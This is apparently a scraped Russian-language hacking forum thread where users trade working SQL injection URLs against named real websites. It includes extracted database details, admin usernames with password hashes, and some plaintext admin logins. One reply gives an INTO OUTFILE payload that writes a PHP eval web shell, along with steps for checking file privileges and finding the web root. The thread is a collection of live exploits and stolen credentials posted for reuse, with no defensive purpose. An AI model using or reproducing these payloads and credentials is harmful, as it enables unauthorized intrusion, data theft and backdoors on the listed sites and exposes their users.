http://www.corpus.cam.ac.uk/jcr/news_article.php?id=99%20and%201=2%20union%20select%20 51,concat(ID,0x3a,CPASS),4,3,2,1%20from%20jcr.regusers-- passwords are hashed .. L7PYN77G93CKS I3TJMOGP/CJ8S I34P65LJ3OV0Y
ООО "ММ ПРИС" Code: http://www.mmpris.ru/adetails.php?id=-8+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9-- user(): [email protected]_1 version(): 4.1.21-community-max-nt-log database(): 1gb_mmpris.mht тИЦ: 180 PR: 4 Oceanworld Manly Australia Code: http://www.oceanworld.com.au/page.asp?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14-- user(): oceanworld@localhost version(): 5.0.18-nt database(): oceanworld тИЦ: 10 PR: 6
Порыл чуть глубже - нашел поинтереснее табличку tbluser В ней intUserLevel , txtUsername , txtPassword По лимитам вроде 13 юзеров. Пару хэшей расшифровал, но что-то не пускает в админку ... пох У меня вот какой вопрос , а точнее ПРОСЬБА ! Может кто-нить показать на примере (любом, хоть одном из тех, что здесь выкладывают), как через скуль залить шелл ? Не через админку , а именно через скуль (into+outfile конструкция вроде используется или как там?). Инфу почитал на нескольких форумах, но не до конца все понятно ... Если не трудно кому-нибудь - покажите плиз на примере, как это сделать. Думаю многим полезно будет ...
Code: http://www.cageprisoners.com/articles.php?id=-27207%20union%20select%201,2,concat(username,0x3a,password),4,5,6%20FROM%20admins%20-- Mr. Admin:QYYoUiD1cbIlTi2jPbgoQ0 Логин : Пассворда http://www.cageprisoners.com/admin Но только пасс не подходит.. Мб это хеш я особо в них не шарю может подскажите где расшифровать или хотябы что это за тип хеша.
хз..по моему это редкость.. надо чтобы был включён файл прив и кавычки не фильтруются и ещё путь к корюн чтобы знать.. в общем примерно так +union+select+'<?php eval($_GET[‘e’]) ?>'+into+outfile+'/путь к корню сайта'-- файл прив проверять так +union+select+1,file_priv+from+mysql.user-- путь к сайту иногда даётся так +union+select+1,load_file('/')-- иногда может быть в конфиге апача.. забыл в каких местах конфиги хранятся..на форуме есть..
Code: http://empireguru.ru/index.html?id=97&parent_id=-2+union+select+1,2,3,4,5,concat(email,name,converge_pass_salt,0x27,converge_pass_hash),7,8+from+ibf_members+m+left+join+ibf_members_converge+mc+ON+(m.email%20=%20mc.converge_email)-- [email protected] - мыло SCANER логин "S"4Y соль c16aa084c6d6a0b2cf5d69bdc32f4204 кэш наглядный пример инъекции которая достает пару юзер:пасс из IPB
Code: http://www.franciscansinternational.org/docs/statement.php?id=-464%20union%20select%201,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20--
Code: http://www.cdma.kh.ua/articles/index.php?view=article&id=-999%20union%20select%201,concat(user(),0x3a,version(),0x3a,database()),3 plintys_gsm@localhost:5.0.51a-community-log: plintys_cdma Code: http://www.cdma.kh.ua/forum/admin/ login: pv pass: 2005 Code: http://www.p-m.com.ua/news/index.php?view=bulletin&id=-999%20union%20select%201,2,3,concat(user(),0x3a,version(),0x3a,database()),5 pminua_pm@localhost:5.0.51a-community-log: pminua_pmcomua Code: http://www.m-m.com.ua/article/index.php?view=article&id=-999%20union%20select%201,2,3,concat(user(),0x3a,version(),0x3a,database()) mmcomua_tok@localhost:5.0.51a-community-log:mmcomua_mm Code: http://kdsk.com.ua/gallery.php?imID=-999+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6 kdskcom_site@localhost:5.0.51a-community-log:kdskcom_site Code: http://www.tet.kharkov.ua/articles/index.php?view=article&id=-999%20union%20select%201,concat(user(),0x3a,version(),0x3a,database()),3 tetkhua_tetkha@localhost:5.0.51a-community-log:tetkhua_tetkha Code: http://www.tet.kharkov.ua/forum/admin/ login: tet pass: tet2008 Code: http://www.danica-biola.com.ua/resource.php?id_serv=-999+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3 danica_db@localhost:5.0.51a-community-log:danica_biolacomua Code: http://www.legion.kharkov.ua/publication/?view=publication&id=-999+union+select+1,2,3,4,5,concat(user(),0x3a,version(),0x3a,database()) legion_val@localhost:5.0.51a-community-log:legion_leg Code: http://www.afh.kharkov.ua/catalogue/index.php?id=4+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6 plintys_afh@localhost:5.0.51a-community-log: plintys_afh
PR 7 http://www.northeastern.edu/gradstudies/stories/index.php?id=-86+union+select+1,table_name,3,4,5,6+from+INFORMATION_SCHEMA.TABLES-- Выводятся все таблицы и колонки =)
http://www.compasspoint.org/boardcafe/details.php?id=414114+union+select+1,2,3,4,concat_ws(0x3a3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 5.0.22-log [email protected] compasspoint http://www.aeo.com.pk/indexnew.php?id=9999914+union+select+1,2,concat_ws(0x3a3a,version(),user(),database()),4,5,6,7-- 5.0.51a-community-log [email protected] aeo http://www.alreves.org/artists.php?lang=br&cod_artist=88888810+union+select+1,2,3,concat_ws(0x3a3a,version(),user(),database()),5,6-- 5.0.67-community-log alreveso_alreves@localhost alreveso_alreves http://www.adhesivetape.net/product_details.php?id=1488888+union+select+1,2,3,concat_ws(0x3a3a,version(),user(),database())-- 5.0.67-community-nt-log [email protected] taperange http://improvised.emagine.ie/news_det.php?id=1799999+union+select+1,2,3,4,concat_ws(0x3a3a,version(),user(),database()),6,7,8,9,10,11,12-- 5.0.45-log [email protected] improvi_database
Novel Games - Good Games for Your Whole Family Code: http://www.novelgames.com/gamelicense/codes.php?id=-8+union+select+concat(version(),0x3a,user(),0x3a,database())-- user(): oceanworld@localhost version(): 4.1.10-log database(): novelgames тИЦ: 80 PR: 5 Группа компаний Icon Communications Code: http://iconcom.ru/page.php?id=-8+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5-- user(): [email protected] version(): 4.0.20-log database(): glance_db PR: 2
эх давно я тут не постил... Российская Ассоциация Политической Науки PR 6 тИЦ 180 http://www.rapn.ru/index.php?grup=634&doc=-2637%20union%20select%20username,user_email,3,4,5,user_password%20from%20rapn_users--
Code: http://www.myworldhardware.com/v4/articles.php?ID=104&Page_ID=-1+union+select+1,2,3,concat(name,0x3a,mgroup,0x3a,password,0x3a,email),5%20from%20ibf_members+limit+2,1-- Имя: группа: пасс: мыло rkcs:4:56defccc63de74d71ae919ab1ecae656:[email protected]
LOSINGTODAY.COM - THE INDIE MUSIC MAGAZINE http://www.losingtoday.com/news.php?id=9991475+union+select+1,2,concat_ws(0x3a3a,version(),user(),database()),4,5,6,7,8,9,10--&news_alpha=f 4.0.17-standard admin_root@localhost admin_losingtoday http://www.bali-koe.com/details.php?id=8888812+union+select+1,2,3,4,5,6,7,concat_ws(0x3a3a,version(),user(),database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43-- 4.1.22-standard jnarwast_etd@localhost jnarwast_balikoe http://www.monarchwatch.org/waystations/registry/detail.php?id=148912345+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_ws(0x3a3a,version(),user(),database()),19-- 4.1.22-standard monarchw_ws@localhost monarchw_waystation
biogeodb.stri.si.edu PR -5 PHP: http://biogeodb.stri.si.edu/herbarium/search/quick/?search_key=antichat-forevo')union+select+1,2,3,unhex(hex(concat_ws(0x2f,id_users,email,password,status))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+test.tbl_users/* PageRank: 8 тИЦ: 140 PHP: http://www.sju.edu/academics/hsb/campbell/research-guides/index-new2.php?subid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,SCHEMA_NAME,17+from+INFORMATION_SCHEMA.SCHEMATA/*
http://www.daiso.ro/lista_magazine.php?judet=-6'+UNION+SELECT+CONCAT_WS(0x3a,version(),database(),user())/* Database Version: 5.0.32-Debian_7-log Database name: daiso User name: daiso@localhost админка www.daiso.ro/admin есть маленькая проблемка, данные из БД не подходят к админке, если посмотреть на сервак по реверс айпи то 99% из сайтов на хостинге имеют один и тот же движок и админка у них у всех одинаковая, то есть по одному и тому же адресу..выскакивает окошко куда надо ввести логин и пасс... если у кого нибудь получтся зайти в админку , большая просьба проинформировать меня. Спасибо
Code: http://www.northeastern.edu/gradstudies/stories/index.php?id=-86+union+select+1,concat(username,0x3a,password),3,4,5,6+from+coop_evaluation.users-- but cant dehash pass
